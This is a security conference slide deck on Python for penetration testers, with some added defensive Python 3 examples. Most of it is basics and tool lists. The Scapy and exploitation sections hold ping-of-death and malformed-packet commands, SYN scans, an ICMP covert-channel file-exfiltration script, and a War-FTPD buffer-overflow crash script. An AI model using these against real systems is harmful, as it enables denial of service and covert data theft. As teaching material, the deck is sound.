python - Security BSides


>>>import antigravity
Overview of Python
Flying made simple without
the Nyquil hangover
Keith Dixon
@Tazdrumm3r
Agenda
• About me
• About Python
• Python basics
• Python’s uses
• Coding for Penetration Testers book
• Tips, tricks, observations
• Resources
About me
Who am I?
• Husband/father/geek/gets distracted by shiny objects easily
• Career path switched to IT in 1999, professionally in IT since 2001
  – Learning, studying, and currently interviewing for infosec professional roles
• VBScript – 2007
• Python – 2011
About Python
• Conceived in the late 1980s by Guido van Rossum at CWI.
• Python 2.0 was released on October 16th, 2000
• Python 3.0 was released in December 2008
What is Python good for?
• Python comes with a large standard library that covers areas such as:
  • string processing
  • Internet protocols
  • software engineering
  • operating system interfaces
  • artificial intelligence (because of similarities to Lisp)
What is Python good for?
Extensive use in the information security industry
• Exploit development
• Network
• Debugging
• Reverse engineering
• Fuzzing
• Web
• Forensics
• Malware analysis
• PDF
What is Python good for?
• Easy to write short scripts for system admin work.
• Python code is easy to understand.
• Once the basic syntax is learned, even the most complicated scripts can make sense.
What is Python good for?
• Python is cross platform!!
• It will work on Linux, Windows, Mac and most every other OS.
• Many, many resources and a big, friendly community
Python tools
• Social-Engineer Toolkit - specifically designed to perform advanced attacks against the human element.
• Artillery - a honeypot/monitoring/prevention tool used to protect Linux-based systems.
• Fast-Track - aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network.
• Scapy - send, sniff and dissect and forge network packets. Usable interactively or as a library
• Pytbull - flexible IDS/IPS testing framework (shipped with more than 300 tests)
• Scrapy - a fast high-level screen scraping and web crawling framework, used to crawl websites and extract structured data from their pages
• W3af - a Web Application Attack and Audit Framework.
Inspiration for the idea? (Part 1)
Inspiration for the idea? (Part 2)
Post CSAW CTF
Python 101
• Indentation does matter
This will work:
startNumber = int(raw_input("Enter the start number here "))
endNumber = int(raw_input("Enter the end number here "))
def fib(n):
    if n < 2:
        return n
    return fib(n-2) + fib(n-1)
print map(fib, range(startNumber, endNumber))
But this won’t… (the body of fib and of the if block are not indented, so Python raises an IndentationError):
startNumber = int(raw_input("Enter the start number here "))
endNumber = int(raw_input("Enter the end number here "))
def fib(n):
if n < 2:
return n
return fib(n-2) + fib(n-1)
print map(fib, range(startNumber, endNumber))
Python 101
• All scripts are considered modules
• All functions inside a module can be used, or only certain methods can be used inside a script
• Help is built in
Entire module:
>>> import sys
Partial method:
>>> from sys import argv
Help on modules:
>>> import sys, hashlib
>>> help(sys)
>>> help(hashlib)
Help on methods:
>>> import sys, hashlib
>>> help(sys.argv)
>>> help(hashlib.sha512)
From the shell:
keith@dw ~$ pydoc sys
keith@dw ~$ pydoc hashlib
keith@dw ~$ pydoc sys.argv
keith@dw ~$ pydoc hashlib.sha512
Python 101
• It can be run interactively (via command prompt on Windows, via shell on Linux):
keith@dw ~ $ python
Python 2.7.2
Type "help", "copyright"...
>>>
  • IDLE
  • DreamPie
  • IPython
• Scripts
Windows – file extensions:
  • *.py – Python script
  • *.pyc – Compiled Python file (generated by running script)
Linux – file extensions (optional):
  • *.py – Python script
  • *.pyc – Compiled Python file (generated by running script)
Running scripts
Windows:
• .py file extension associated with python.exe
• Should have #!/usr/bin/python at the top of the script in case you want to run it on Linux
• If the path to the interpreter is in your system path, you can double-click the script to run it, otherwise…
C:\Users\Keith>python password.py
Linux:
• Must have #!/usr/bin/python (path to python) at the top of the script
• If you’re running it from the terminal, the script must be chmod’ed to make it executable, or you can call python and the script name…
keith@dw ~ $ python password.py
Python 102
• Data types
Numbers
• Integers
A = 10
• Long integers (octal, hex, binary)
B = 0100 or B = 0x41 or B = 0b1000000
• Float
C = 3.56
• Complex
D = 3.16j
String
A = 'This is a string'
print A          -> 'This is a string'
print A[0]       -> 'T'
print A[3:6]     -> 's i'
print A[4:]      -> ' is a string'
print A * 2
print A + " and this is how it prints"
List (mutable)
list = ['abc', 45, 'The Avengers', 0x67, 'def', 15.5]
print list
print list[0]
print list[1:3]
print list[2:]
list.append("Detroit")
list is now ['abc', 45, 'The Avengers', 0x67, 'def', 15.5, 'Detroit']
Tuple (immutable)
list = ('abc', 45, 'The Avengers', 0x67, 'def', 15.5)
print list
print list[0]
print list[1:3]
print list[2:]
list.append("Detroit")
AttributeError: 'tuple' object has no attribute 'append'
• Conditional statements
If statement (comparison uses ==, a single = is assignment):
if x == True:
    print True
If/else statement:
if x == 1:
    print "1"
else:
    print "not 1"
Elif statement:
if expression1:
    statement(s)
elif expression2:
    statement(s)
else:
    statement(s)
Python 102
• Looping
While loop:
count = 0
while (count < 9):
    print 'The count is:', count
    count = count + 1
print "Good bye!"
For loop:
import sys
code1 = (sys.argv[1])
code_split = code1.split(':')
for i in code_split:
    code1a = int(i)
    codefinal = chr(code1a)
    sys.stdout.write(codefinal)
Loop control:
count = 0
while (count < 9):
    print 'The count is:', count
    count = count + 1
    if count == 7:
        break
print "Good bye!"
• Functions
Creating a function:
def base64_decode(base64_key):
    answer = base64_key.decode('base64', 'strict')
    print answer
In use:
>>> csaw.base64_decode('V2VsY29tZSB0byBCc2lkZXMgRGV0cm9pdCAyMDEyLiBNYWtlIHN1cmUgdG8gdGhhbmsgUnlhbiwgU3RldmVuLCBXb2xmZ2FuZywgYW5kIEt5bGUgZm9yIGFsbCB0aGUgaGFyZCB3b3JrIHRoZXkgZGlkIHRvIG1ha2UgdGhpcyB5ZWFyIHN1Y2ggYSBzdWNjZXNzIQ==')
Welcome to Bsides Detroit 2012. Make sure to thank Ryan, Steven, Wolfgang, and Kyle for all the hard work they did to make this year such a success!
Python 102
• Files
Open a file for reading:
#!/usr/bin/python
f = open('base64.txt', 'r')
file = f.read()
answer = file.decode('base64', 'strict')
print answer
f.close()
Write to a file:
#!/usr/bin/python
import sys
if len(sys.argv) < 2:
    sys.exit("Usage " + sys.argv[0] + " <Base64 code you wish to decode>\n")
basecode = sys.argv[1]
answer = basecode.decode('base64', 'strict')
print answer
fo = open("base64.txt", "w")
fo.write(answer)
fo.close()
• Input/output
raw_input (returns whatever was typed, as a string):
#!/usr/bin/python
str = raw_input("Enter your input: ")
print "Received input is : ", str
Input is   Thanks for coming to Bsides
Output is  Received input is : Thanks for coming to Bsides
input (in Python 2, evaluates whatever was typed as a Python expression):
#!/usr/bin/python
str = input("Enter your input: ")
print "Received input is : ", str
Input is   5 * 5
Output is  25
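Python 2’s input() hands the typed text to eval(), which is why "5 * 5" came back as 25: any expression typed at that prompt is executed. As an added example (not from the deck), this is the safe way to accept a typed value in Python 3: parse it as a literal with ast.literal_eval and otherwise keep it as plain text.

```python
import ast


def parse_user_value(text: str):
    """Return the Python literal written in text, or the text itself otherwise.

    ast.literal_eval accepts only literals (numbers, strings, tuples, lists,
    dicts, sets, booleans, None).  Expressions and calls such as "5 * 5" or
    "__import__('os').system('id')" are rejected instead of being executed,
    which is what Python 2's input() would have done with them.
    """
    text = text.strip()
    try:
        return ast.literal_eval(text)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError):
        # Not a literal: treat it as opaque text, never evaluate it.
        return text


def prompt_for_value(prompt: str = "Enter your input: "):
    """Python 3's input() already returns a str; parse it without eval()."""
    return parse_user_value(input(prompt))


if __name__ == "__main__":
    print("Received input is :", prompt_for_value())
```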
Python’s uses – General scripting
• Cryptography
• Password creation
• Use files (write to/read from)
Cryptography
Encode Base64 code:
#!/usr/bin/python
code = raw_input("Enter the data you wish to be encoded to Base64")
answer = code.encode('base64', 'strict')
print answer
Encode ROT13 code:
#!/usr/bin/python
code = raw_input("Enter the data you wish to be encoded to ROT13")
answer = code.encode('rot13', 'strict')
print answer
Decrypt module
#!/usr/bin/python
import sys

def hexdecode(hex_key):
    # colon-separated hex bytes, e.g. 48:65:6c
    import binascii
    hex_split = hex_key.split(':')
    for decode in hex_split:
        hex_decode = binascii.a2b_hex(decode)
        sys.stdout.write(hex_decode)

def uni_decode(unicode_key):
    # colon-separated decimal code points, e.g. 72:105
    unicode_split = unicode_key.split(':')
    for i in unicode_split:
        code1a = int(i)
        codefinal = chr(code1a)
        sys.stdout.write(codefinal)

def base64_decode(base64_key):
    answer = base64_key.decode('base64', 'strict')
    print answer

def binary_decode(binary_key):
    import math
    # split the bit string into 8-character groups
    f = lambda v, l: [v[i*l:(i+1)*l] for i in range(int(math.ceil(len(v)/float(l))))]
    basecode = f(binary_key, 8)
    for code in basecode:
        decodea = int(code, 2)
        decodeb = chr(decodea)
        sys.stdout.write(decodeb)

def rot13_decode(rot13_key):
    answer = rot13_key.decode('rot13', 'strict')
    print answer
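The decoder functions above (and the base64_decode shown under Functions) rewritten for Python 3, as an added example that is not part of the deck: each returns the decoded text instead of printing it, strict Base64 validation stands in for the Python 2 'strict' codec flag, and an odd-length hex byte or a short final bit group is padded rather than raising. CSAW_MESSAGE is the Base64 string from the Functions slide.

```python
import base64
import binascii
import codecs
import math

# The Base64 value used on the Functions slide of the deck.
CSAW_MESSAGE = ("V2VsY29tZSB0byBCc2lkZXMgRGV0cm9pdCAyMDEyLiBNYWtlIHN1cmUgdG8gdGhhbmsgUnlh"
                "biwgU3RldmVuLCBXb2xmZ2FuZywgYW5kIEt5bGUgZm9yIGFsbCB0aGUgaGFyZCB3b3JrIHRo"
                "ZXkgZGlkIHRvIG1ha2UgdGhpcyB5ZWFyIHN1Y2ggYSBzdWNjZXNzIQ==")


def hex_decode(hex_key: str) -> str:
    """Colon-separated hex bytes ("48:65:6c") -> text; "4" is read as "04"."""
    raw = b"".join(binascii.unhexlify(part.zfill(2))
                   for part in hex_key.split(":") if part)
    return raw.decode("latin-1")


def uni_decode(unicode_key: str) -> str:
    """Colon-separated decimal code points ("72:105") -> text."""
    return "".join(chr(int(part)) for part in unicode_key.split(":") if part)


def base64_decode(base64_key: str) -> str:
    """Base64 -> text; validate=True rejects non-alphabet characters (binascii.Error)."""
    return base64.b64decode(base64_key, validate=True).decode("utf-8")


def binary_decode(binary_key: str) -> str:
    """8-bit groups ("0100100001101001") -> text; a short final group is left-padded."""
    bits = binary_key.replace(" ", "")
    groups = [bits[i * 8:(i + 1) * 8] for i in range(math.ceil(len(bits) / 8))]
    return "".join(chr(int(g.zfill(8), 2)) for g in groups)


def rot13_decode(rot13_key: str) -> str:
    """ROT13 is its own inverse; the rot_13 codec is str -> str in Python 3."""
    return codecs.decode(rot13_key, "rot_13")


DECODERS = {"hex": hex_decode, "uni": uni_decode, "base64": base64_decode,
            "binary": binary_decode, "rot13": rot13_decode}


def decode(kind: str, value: str) -> str:
    """Dispatch on the encoding name; an unknown name raises KeyError."""
    return DECODERS[kind](value)


if __name__ == "__main__":
    print(decode("base64", CSAW_MESSAGE))
```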
Password creation
##Author: ATC
##Please score this on activestate
import string, random
print "How many characters would you like the password to have?"
print "Must be nine or more"
length = input()
password_len = length
password = []
for group in (string.ascii_letters, string.punctuation, string.digits):
    password += random.sample(group, 3)
password += random.sample(
    string.ascii_letters + string.punctuation + string.digits,
    password_len - len(password))
random.shuffle(password)
password = ''.join(password)
print password
http://code.activestate.com/recipes/577905-password-generator/
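The recipe above draws its characters from the random module, a deterministic PRNG that is not meant for secrets, and reads the length with Python 2’s input(). As an added example (not the recipe’s code), the same policy (nine or more characters, at least three from each of letters, punctuation and digits) implemented on the secrets module, with a checker for the policy; the filler characters are drawn with replacement, unlike the recipe’s random.sample.

```python
import secrets
import string

CLASSES = (string.ascii_letters, string.punctuation, string.digits)
MIN_LENGTH = 9      # the recipe's "must be nine or more"
PER_CLASS = 3       # the recipe's three characters from each class


def generate_password(length: int) -> str:
    """Password of the requested length drawn from the OS CSPRNG via secrets."""
    if length < MIN_LENGTH:
        raise ValueError("length must be %d or more" % MIN_LENGTH)
    rng = secrets.SystemRandom()            # sample()/shuffle() backed by os.urandom
    chars = []
    for group in CLASSES:
        chars += rng.sample(group, PER_CLASS)   # three distinct characters per class
    alphabet = "".join(CLASSES)
    # Fill the remainder with replacement, so any length above the minimum works.
    chars += [secrets.choice(alphabet) for _ in range(length - len(chars))]
    rng.shuffle(chars)
    return "".join(chars)


def meets_policy(password: str) -> bool:
    """True if long enough and at least PER_CLASS characters come from each class."""
    return (len(password) >= MIN_LENGTH and
            all(sum(c in group for c in password) >= PER_CLASS for group in CLASSES))


if __name__ == "__main__":
    print(generate_password(16))
```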
Use files (write to/read from)
Read from a file:
#!/usr/bin/python
f = open('base64.txt', 'r')
file = f.read()
answer = file.decode('base64', 'strict')
f.close()
Write to a file:
#!/usr/bin/python
code = raw_input("Enter the data you wish to be encoded to Base64")
answer = code.encode('base64', 'strict')
f = open('base64.txt', 'w')
line = f.write(answer)
f.close()
Python’s uses – Networking
• Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library
• Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests)
• Mallory: man-in-the-middle proxy for testing
• mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly
• Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
• Knock Subdomain Scan: enumerate subdomains on a target domain through a wordlist
• pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap
• libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
• dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
• pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
• Dirtbags py-pcap: read pcap files without libpcap
• flowgrep: grep through packet payloads using regular expressions
• httplib2: comprehensive HTTP client library that supports many features left out of other HTTP libraries
http://www.dirk-loss.de/python-tools.htm
Scapy
www.secdev.org/projects/scapy/
• Packet creation
• Read PCAP files
• Create graphical dumps (must have appropriate supporting tools installed)
• Fuzzing
• Send and receive packets
• TCP traceroute (can do graphical dump as well)
• Sniffing
• Send and receive files through alternate data channels (ICMP)
• Ping
  • ARP ping
  • ICMP ping
  • TCP ping
  • UDP ping
• Wireless frame injection
• OS fingerprinting
• Classic attacks
  • Malformed packets
  • Ping of death
  • Nestea attack
  • ARP cache poisoning
• Scans
  • SYN scan
  • ACK scan
  • XMAS scan
  • IP scan
  • TCP port scan
  • IKE scan
• Advanced traceroute
  • TCP SYN traceroute
  • UDP traceroute
  • DNS traceroute
• VLAN hopping
• Wireless sniffing
• Firewalking
Scapy
• Packet creation
• Stacking layers
Scapy
• Read PCAP files
  • A = rdpcap("<directory where PCAP file is>/<pcap file>")
• Create graphical dumps
  • A[<packet number>].psdump("<location to store .eps file>", layer_shift=1)
Scapy
ConfickerB9hrs.pcap
Scapy
Send packets
• send(IP(dst="192.168.1.1")/ICMP())
• sendp(Ether()/IP(dst="192.168.1.1", ttl=(1,4)), iface="eth0")
• sendp(rdpcap("/tmp/pcapfile"))
• sendp("I'm travelling on Ethernet", iface="eth0", loop=1, inter=0.2)
Scapy
Send and receive packets
• p = sr1(IP(dst="www.slashdot.org")/ICMP()/"XXXXXXXXXXX")
• p = sr1(IP(dst="www.slashdot.org")/ICMP()/"ABCDEFGHIJ")
• p.show()
• sr(IP(dst="192.168.1.10")/TCP(dport=[21,22,23]))
• sr(IP(dst="192.168.1.10")/TCP(dport=[21,22,23]), inter=0.5, retry=-2, timeout=1)
Scapy
Fuzzing
• send(IP(dst="192.168.1.10")/fuzz(ICMP()/NTP(version=4)), loop=1)
• send(IP(dst="192.168.1.10")/fuzz(TCP()/NTP(version=4)), loop=1)
TCP traceroute
• res, unans = traceroute(["www.microsoft.com", "www.cisco.com", "www.yahoo.com"], dport=[80,443], maxttl=20, retry=-2)
Scapy
Sniffing
• sniff(filter="icmp and host 66.35.250.151", count=2)
• a=_
• a.nsummary()
• a[1]
• sniff(iface="eth0", prn=lambda x: x.show())
Scapy
SYN scan
• sr1(IP(dst="72.14.207.99")/TCP(dport=80, flags="S"))
• sr(IP(dst="192.168.1.1")/TCP(sport=666, dport=(440,443), flags="S"))
• sr(IP(dst="192.168.1.1")/TCP(sport=RandShort(), dport=[440,441,442,443], flags="S"))
• ans.summary()
• ans.summary(lambda(s,r): r.sprintf("%TCP.sport% \t %TCP.flags%"))
Scapy
Classic attacks
• Malformed packets
  • send(IP(dst="192.168.1.10", ihl=2, version=3)/ICMP())
• Ping of death
  • send(fragment(IP(dst="192.168.1.10")/ICMP()/("X" * 60000)))
Scapy
To send packets via ICMP
#!/usr/bin/python
import sys
from scapy.all import *
conf.verb = 0
f = open(sys.argv[1])
data = f.read()
f.close()
host = sys.argv[2]
print "Data size is %d " % len(data)
i = 0
while i < len(data):
    # each echo-reply carries a 32-byte slice of the file
    pack = IP(dst=host)/ICMP(type="echo-reply")/data[i:i+32]
    send(pack)
    i = i + 32
print "Data sent"
Scapy
To receive packets via ICMP
#!/usr/bin/python
import sys
from scapy.all import *
conf.verb = 0
f = open(sys.argv[1], "w")
host = sys.argv[2]
count = int(sys.argv[3])
bpf = "icmp and host " + host   # BPF filter; not named filter, to avoid shadowing the builtin
print "sniffing with filter (%s) for %d packets" % (bpf, count)
packets = sniff(count=count, filter=bpf)
for p in packets:
    if p.haslayer(Raw):          # skip ICMP packets that carry no payload
        f.write(p[Raw].load)
f.close()
print "Data received"
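The two scripts above move a file as a stream of ICMP echo-replies that nobody requested. As an added detection example (not from the deck, and pure Python rather than Scapy), this parses raw IPv4/ICMP packets, flags echo-replies carrying a payload for which no matching echo-request (same id and sequence, opposite direction) was seen earlier, and reassembles the flagged chunks the way receiveICMP.py does. The hosts, id/seq values and the sample capture are constructed for the example.

```python
import socket
import struct

ECHO_REPLY, ECHO_REQUEST = 0, 8


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum used by both the IPv4 and ICMP headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp_packet(src: str, dst: str, icmp_type: int, ident: int, seq: int,
                      payload: bytes) -> bytes:
    """Constructed IPv4+ICMP packet (no link layer); only used to build the sample."""
    icmp = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq) + payload
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + icmp


def parse_ipv4_icmp(packet: bytes):
    """ICMP fields of an IPv4 packet, or None when it is not IPv4 carrying ICMP."""
    if len(packet) < 20 or packet[0] >> 4 != 4 or packet[9] != 1:
        return None
    ihl = (packet[0] & 0x0F) * 4
    icmp = packet[ihl:]
    if len(icmp) < 8:
        return None
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", icmp[:8])
    return {"src": socket.inet_ntoa(packet[12:16]), "dst": socket.inet_ntoa(packet[16:20]),
            "type": icmp_type, "id": ident, "seq": seq, "payload": icmp[8:]}


def find_unsolicited_replies(packets):
    """(src, dst, payload) for every echo-reply with data whose matching echo-request
    (same id/seq, reversed direction) never appeared earlier in the capture.  The
    sender script only ever emits echo-replies, so each of its chunks lands here."""
    outstanding = set()
    findings = []
    for raw in packets:
        p = parse_ipv4_icmp(raw)
        if p is None:
            continue
        if p["type"] == ECHO_REQUEST:
            outstanding.add((p["src"], p["dst"], p["id"], p["seq"]))
        elif p["type"] == ECHO_REPLY:
            key = (p["dst"], p["src"], p["id"], p["seq"])   # the request went the other way
            if key in outstanding:
                outstanding.discard(key)
            elif p["payload"]:
                findings.append((p["src"], p["dst"], p["payload"]))
    return findings


def reassemble(findings, src: str, dst: str) -> bytes:
    """Join the flagged payloads of one src->dst pair, as the receiver script does."""
    return b"".join(pl for s, d, pl in findings if s == src and d == dst)


# Constructed sample capture: one normal ping exchange, then a file sent the way
# the send script does it (echo-reply only, 32-byte slices, Scapy's default id/seq 0).
SECRET = b"Thanks for coming to Bsides Detroit 2012"
SAMPLE_CAPTURE = [
    build_icmp_packet("10.0.0.9", "10.0.0.1", ECHO_REQUEST, 0x1234, 1, b"ping"),
    build_icmp_packet("10.0.0.1", "10.0.0.9", ECHO_REPLY, 0x1234, 1, b"ping"),
] + [
    build_icmp_packet("10.0.0.5", "10.0.0.9", ECHO_REPLY, 0, 0, SECRET[i:i + 32])
    for i in range(0, len(SECRET), 32)
]


def analyse_sample():
    return find_unsolicited_replies(SAMPLE_CAPTURE)


if __name__ == "__main__":
    for src, dst, payload in analyse_sample():
        print("unsolicited echo-reply %s -> %s, %d payload bytes" % (src, dst, len(payload)))
    print(reassemble(analyse_sample(), "10.0.0.5", "10.0.0.9"))
```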
Python’s uses – Debugging and Reverse Engineering
• Immunity Debugger: scriptable GUI and command line debugger
  • mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr
• Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
• IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
• pefile: read and work with Portable Executable (aka PE) files
• pydasm: Python interface to the libdasm x86 disassembling library
• PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
• uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
• diStorm64: disassembler library for AMD64, licensed under the BSD license
• python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python
• vdb / vtrace: vtrace is a cross-platform process debugging API implemented in Python, and vdb is a debugger which uses it (mirror)
• Androguard: reverse engineering and analysis of Android applications
http://www.dirk-loss.de/python-tools.htm
Coding for Pentesters – Exploitation scripting
Building Exploits with Python
1. Windows XP SP0
2. War-FTPD v 1.65
3. Immunity Debugger
Step 1 – Open WarFTPD with Immunity
Step 2 – Run WarFTPD by pressing F9 and then set it to GoOnline.
Step 3 – Build this script and run it… and enjoy the show
#!/usr/bin/python
import sys
import socket
hostname = sys.argv[1]
username = "A" * 1024
passwd = "anything"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((hostname, 21))
except socket.error:
    print "[-] Connection error!"
    sys.exit(1)
r = sock.recv(1024)
print "[+] " + r
sock.send("user %s\r\n" % username)
r = sock.recv(1024)
print "[+] " + r
sock.send("pass %s\r\n" % passwd)
r = sock.recv(1024)
print "[+] " + r
sock.close()
Coding for Pentesters – Exploitation scripting
The connection attempt with the user name of "A" * 1024 (1024 A characters)…
Coding for Pentesters – Exploitation scripting
Step 4 – WarFTPD crashes!
Python’s uses – Malware analysis
• torwget.py: Multi-platform TOR-enabled URL
• clamav_to_yara.py: Convert ClamAV antivirus signatures to YARA rules
• peid_to_yara.py: Convert PEiD packer signatures to YARA rules
• av_multiscan.py: Script to implement your own antivirus multiscanner
• pescanner.py: Detect malicious PE file attributes
• ssdeep_procs.py: Detect self-mutating code on live Windows systems using ssdeep
• avsubmit.py: Command-line interface to VirusTotal, ThreatExpert, Jotti, and NoVirusThanks
• dbmgr.py: Malware artifacts database manager
• artifactscanner.py: Application to scan live Windows systems for artifacts (files, Registry keys, mutexes) left by malware
• mapper.py: Create static PNG images of IP addresses plotted on a map using GeoIP
• googlegeoip.py: Create dynamic/interactive geographical maps of IP addresses using Google charts
• sc_distorm.py: Script to produce disassemblies (via DiStorm) of shellcode and optionally apply an XOR mask
• vmauto.py: Python class for automating malware execution in VirtualBox and VMware guests
• mybox.py: Sample automation script for VirtualBox based on vmauto.py
Python’s uses – Malware analysis
• myvmware.py: Sample automation script for VMware based on vmauto.py
• analysis.py: Python class for building sandboxes with support for analyzing network traffic, packet captures, and memory
• scd.py: Immunity Debugger PyCommand for finding shellcode in arbitrary binary files
• findhooks.py: Immunity Debugger PyCommand for finding Inline-style user mode API hooks
• pymon.py: WinAppDbg plug-in for monitoring API calls, alerting on suspicious flags/parameters and producing an HTML report
• xortools.py: Python library for encoding/decoding XOR, including brute force methods and automated YARA signature generation
• trickimprec.py: Immunity Debugger PyCommand for assistance when rebuilding import tables with Import REconstructor
• kraken.py: Immunity Debugger PyCommand for cracking Kraken’s Domain Generation Algorithm (DGA)
• sbstrings.py: Immunity Debugger PyCommand for decrypting Silent Banker strings
• install_svc.py: Python script for installing a service DLL and supplying optional arguments to the service
• dll2exe.py: Python script for converting a DLL into a standalone executable
• windbg_to_ida.py: Python script to convert WinDbg output into data that can be imported into IDA
Python’s uses – Malware analysis
Practical Malware Analysis
• FakeNet - http://practicalmalwareanalysis.com/
Python’s uses – Malware analysis
• Cuckoo Sandbox - a malware analysis system used to analyze Windows
executables, DLL files, PDF documents, Office documents, PHP scripts,
Python scripts, Internet URLs and almost anything else you can imagine.
• yara-python: identify and classify malware samples
• pyew: command line hexadecimal editor and disassembler, mainly to
analyze malware
• Exefilter: filter file formats in e-mails, web pages or files. Detects many
common file formats and can remove active content
• pyClamAV: add virus detection capabilities to your Python software
• jsunpack-n, generic JavaScript unpacker: emulates browser functionality to
detect exploits that target browser and browser plug-in vulnerabilities
• phoneyc: pure Python honeyclient implementation
http://www.dirk-loss.de/python-tools.htm
Python’s uses – Fuzzing
• Sickfuzz: a fuzzer made out of several custom .spk files and a python script to wrap them up, including some tshark support and other features.
• Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
• Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing
• antiparser: fuzz testing and fault injection API
• TAOF, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
• Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
• FileP: file fuzzer. Generates mutated files from a list of source files and feeds them to an external program in batches
• Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
• Fuzzbox: multi-codec media fuzzer
• Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
• Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
• WSBang: perform automated security testing of SOAP based web services
• Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
• fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano
• Fusil: Python library used to write fuzzing programs
http://www.dirk-loss.de/python-tools.htm
Python’s uses – Fuzzing
Sickfuzz
Python’s uses – Web
• Scrapy: a fast high-level screen scraping and web crawling framework, used
to crawl websites and extract structured data from their pages. It can be
used for a wide range of purposes, from data mining to monitoring and
automated testing.
• ProxMon: processes proxy logs and reports discovered issues
• Twill: browse the Web from a command-line interface. Supports
automated Web testing
• Windmill: web testing tool designed to let you painlessly automate and
debug your web application
• FunkLoad: functional and load web tester
• spynner: Programmatic web browsing module for Python with
Javascript/AJAX support
• python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript
engine; allows for the evaluation and calling of Javascript scripts and
functions
http://www.dirk-loss.de/python-tools.htm
Python’s uses – Web
http://snippets.scrapy.org/snippets/7/
Python’s uses – Forensics
• Volatility: extract digital artifacts from volatile memory (RAM)
samples
• SandMan: read the hibernation file, regardless of Windows
version
• LibForensics: library for developing digital forensics applications
• TrIDLib, identify file types from their binary signatures. Now
includes Python binding
• aft: Android forensic toolkit
http://www.dirk-loss.de/python-tools.htm
Python’s uses – Forensics
Volatility
Python’s uses – Miscellaneous
• InlineEgg: toolbox of classes for writing small assembly programs in Python
• Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
• RevHosts: enumerate virtual hosts for a given IP address
• simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API
• PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools (abandoned?)
• Hachoir: view and edit a binary stream field by field
Other useful libraries and tools
• IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and
its own special command system
• Beautiful Soup: HTML parser optimized for screen-scraping
• Mayavi: 3D scientific data visualization and plotting
• Twisted: event-driven networking engine
• Suds: lightweight SOAP client for consuming Web Services
• M2Crypto: most complete OpenSSL wrapper
• NetworkX: graph library (edges, nodes)
• pyparsing: general parsing module
• lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
• Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python
• Pexpect: control and automate other programs, similar to Don Libes `Expect` system
• Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython
• PyQt and PySide: Python bindings for the Qt application framework and GUI library
http://www.dirk-loss.de/python-tools.htm
Coding for Penetration Testers book
Script | Function | Learned
• Webcheck_v1.py | Monitor web server – verify it remains up | 1. Script arguments  2. Connect to web server and run a GET request
• Webcheck_v2.py | Monitor web server – verify it remains up (default to port 80) | 1. Alternate script arguments method
• Subnetcalc.py | Calculate subnet mask, broadcast address, network range, and gateway from IP/CIDR | 1. Parse out values programmatically  2. Math functions with variables  3. Displaying results  4. Using FOR loops
• Pass.py | Determines if users are using the original default assigned password | 1. Use the crypt module
• Robotparser.py | Retrieve the paths from the robots.txt | 1. Parse the robots.txt file with the built-in robotparser module  2. Nesting FOR loops
• root_check.py | Checks to see what permissions the logged-in account has (normal user, root or system account) | 1. Using IF and ELIF conditional statements  2. Use OS module to make system calls
• Readshadow.py | Checks to see if you have permission to read /etc/shadow | 1. Use OS module to make system calls  2. Tests permissions on files to see if current credentials can read the file
• Network_socket.py | Connect to website, pull contents (hard coded) | 1. Network socket creation  2. Spaces will bite you in the ass where you least expect it.
Coding for Penetration Testers book
Script | Function | Learned
• network_socket_argument.py | Connect to website, pull contents (site specified by argument) | 1. Network socket creation  2. Spaces will bite you in the ass where you least expect it.
• Server_connect.py | Once a connection is made, send back a string | 1. Network socket creation  2. Allow incoming connections.
• receiveICMP.py | To receive a file from another system via ICMP (in conjunction with sendICMP.py) | 1. Python script using Scapy
• sendICMP.py | To send a file to another system via ICMP (in conjunction with receiveICMP.py) | 1. Python script using Scapy
Little gems I found
Description | Function | Site
• Python-nmap | It’s a Python library which helps in using nmap. | http://xael.org/norman/python/pythonnmap/
